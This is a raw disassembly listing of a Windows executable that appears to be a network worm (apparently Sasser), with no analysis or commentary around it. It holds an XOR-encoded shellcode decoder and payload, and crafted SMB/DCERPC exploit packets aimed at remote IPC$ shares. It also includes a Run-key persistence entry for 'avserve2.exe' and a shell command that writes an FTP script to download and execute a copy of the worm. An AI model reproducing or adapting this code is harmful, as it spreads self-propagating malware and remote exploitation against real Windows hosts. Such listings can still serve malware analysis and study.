extrn CopyFileA:dword ; CODE XREF: sub_4020D7+82�p
; DATA XREF: sub_4020D7+82�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetWindowsDirectoryA:dword ; CODE XREF: sub_4020D7+27�p
; DATA XREF: sub_4020D7+27�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_404573+2A�p
; sub_404573+3B�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: sub_4043C7+28�p
; DATA XREF: sub_4043C7+28�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_4043C7+76�p
; sub_404478+51�p
; DATA XREF: ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_403CF4+2E�p
; sub_403D2A+D�p ...
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; DATA XREF: sub_403A40+1A�r
; UINT __stdcall GetACP()
extrn GetACP:dword ; DATA XREF: sub_403A40+2F�r
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: sub_4038A7+48�p
; sub_403AE6+14�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: sub_40371C+3F�p
; sub_40371C+12D�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: sub_40371C+59�p
; sub_40371C+8D�p
; DATA XREF: ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_40371C+C5�p
; sub_40371C+11B�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_4035C9+14A�p
; DATA XREF: sub_4035C9+14A�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_403C87+27�p
; sub_403D93+2C4�p ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_403D93+257�p
; sub_403D93+2B2�p
; DATA XREF: ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_403382+11�p
; DATA XREF: sub_403382+11�r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: sub_403382+2F�p
; DATA XREF: sub_403382+2F�r
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: sub_4031D7+FF�p
; sub_4031D7+166�p
; DATA XREF: ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: sub_4046FE+42�p
; sub_4046FE+14D�p ...
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: sub_4046FE+5E�p
; sub_4046FE+A7�p
; DATA XREF: ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: .text:00402900�p
; DATA XREF: .text:00402900�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: .text:004028DD�p
; sub_4031D7+59�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: .text:004028B2�p
; DATA XREF: .text:004028B2�r
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: .text:00402864�p
; DATA XREF: .text:00402864�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_402959+1D�p
; sub_402B10+91�p
; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_402B10+17�p
; DATA XREF: sub_402B10+17�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_402B10+10�p
; DATA XREF: sub_402B10+10�r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: sub_402BC3+138�p
; DATA XREF: sub_402BC3+138�r
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword ; CODE XREF: sub_4030A5+11F�p
; DATA XREF: sub_4030A5+11F�r
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword ; CODE XREF: sub_4030A5+CE�p
; DATA XREF: sub_4030A5+CE�r
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_4030A5+93�p
; sub_4030A5+B5�p ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword ; CODE XREF: sub_4030A5:loc_4030D4�p
; sub_4030A5+E1�p
; DATA XREF: ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword ; CODE XREF: sub_4030A5+1B�p
; sub_4030A5+5B�p
; DATA XREF: ...
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn LockResource:dword ; CODE XREF: sub_4031D7+19D�p
; DATA XREF: sub_4031D7+19D�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: sub_4031D7+158�p
; sub_4035C9+143�p
; DATA XREF: ...
;
; Imports from user32.dll
;
; int wsprintfA(LPSTR, LPCSTR, ...)
extrn wsprintfA:dword ; CODE XREF: sub_401210+1C�p
; sub_40127D+B7�p ...
;
; Imports from ws2_32.dll
;
; SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept:dword ; CODE XREF: sub_401E65+68�p
; DATA XREF: sub_401E65+68�r
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_401398+17F�p
; sub_401398+1A4�p ...
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_40127D+DE�p
; sub_401398+163�p ...
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_401153+23�p
; sub_40127D+27�p ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_401153+50�p
; sub_40127D+51�p ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_401153+68�p
; sub_40127D+6C�p ...
; int __stdcall listen(SOCKET s, int backlog)
extrn listen:dword ; CODE XREF: sub_401E65+51�p
; DATA XREF: sub_401E65+51�r
; int __stdcall gethostname(char *name, int namelen)
extrn gethostname:dword ; CODE XREF: sub_4010D2+18�p
; DATA XREF: sub_4010D2+18�r
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_4010D2+43�p
; DATA XREF: sub_4010D2+43�r
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn inet_addr:dword ; CODE XREF: sub_401045+8�p
; sub_4011D5+7�p ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_4010D2+29�p
; sub_4011D5+1E�p ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_401028+10�p
; DATA XREF: sub_401028+10�r
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_401E65+43�p
; DATA XREF: sub_401E65+43�r
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_401153+76�p
; sub_40127D+10F�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 405120h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h
; DATA XREF: .text:00402843�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4035C9+119�o
align 4
asc_4053E8 db 0Ah ; DATA XREF: sub_4035C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4035C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4035C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4035C9+7D�o
align 4
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: sub_40371C+39�o
; sub_4046FE+36�o
align 4
dword_405428 dd 0FFFFFFFFh, 403815h, 403819h; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404573+3D�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404573+35�o
; char ProcName[]
ProcName db 'MessageBoxA',0 ; DATA XREF: sub_404573+24�o
; char LibFileName[]
LibFileName db 'user32.dll',0 ; DATA XREF: sub_404573+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: sub_4046FE+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 77E34D78h, 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 0
dd 7C801D77h, 7C80C729h, 7C839308h, 7C838D93h, 7C827778h
dd 7C802442h, 7C839418h, 7C85E610h, 7C80B357h, 7C81082Fh
dd 7C86114Dh, 7C910331h, 7C8092ACh, 7C80EB3Fh, 7C830053h
dd 7C82293Bh, 7C80AC28h, 7C9179FDh, 7C809A81h, 7C9105D4h
dd 7C81E82Ah, 7C809943h, 7C812BE6h, 7C80A480h, 7C838CB9h
dd 7C809CADh, 7C810F9Fh, 7C937A40h, 7C91043Dh, 7C809B14h
dd 7C812929h, 7C811110h, 7C811069h, 7C80CEC4h, 7C832E2Bh
dd 7C80B529h, 7C801EEEh, 7C812C8Dh, 7C8114ABh, 7C81CAA2h
dd 7C801E16h, 7C80E00Dh, 7C862B8Ah, 7C81DC3Fh, 7C81485Fh
dd 7C80A0C7h, 7C81CC23h, 7C812C78h, 7C80C6CFh, 7C812CA9h
dd 0
dd 77D4A2DEh, 0
dd 71AC1028h, 71AB615Ah, 71AB428Ah, 71AB2B66h, 71AB3B91h
dd 71AB406Ah, 71AB88D3h, 71AB50C8h, 71AB3F41h, 71AB2BF4h
dd 71AB4FD4h, 71AB664Dh, 71AB3E00h, 71AB9639h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403C6B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) ; LPCSTR off_406030
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
; char buf[]
buf db 3 dup(0) ; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
db 85h
dd 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
; char byte_406258[]
byte_406258 db 3 dup(0) ; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
db 0A4h
dd 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
; char byte_406304[]
byte_406304 db 3 dup(0) ; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
db 0DAh
dd 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
; char byte_406448[]
byte_406448 db 3 dup(0) ; DATA XREF: sub_40159E+369�o
db 64h
dd 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
; char byte_4064B4[]
byte_4064B4 db 3 dup(0) ; DATA XREF: sub_40159E+392�o
db 9Ch
dd 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; LPCSTR lpValueName
lpValueName dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: StartAddress+1A�r
; StartAddress+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: StartAddress+77�r
; StartAddress+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: StartAddress+A8�r
; StartAddress+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: StartAddress+2BC�r
; StartAddress+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: StartAddress+184�r
; StartAddress+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: StartAddress+1B9�r
; StartAddress+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:lpValueName�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
; char PathName[]
PathName db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
; char aI[]
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
; char aSC[]
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 dword_406A34 dd 1CEC8166h dword_406A38 dd 0E4FF07h dword_406A3C dd 302E35h dword_406A40 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: StartAddress+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: StartAddress+1A2�o
align 4
; char aI_I_I_I[]
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: StartAddress+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: StartAddress+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: StartAddress+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: StartAddress+95�o
align 4
aUser db 'USER',0 ; DATA XREF: StartAddress+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
; char Name[]
Name db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
; char SubKey[]
SubKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
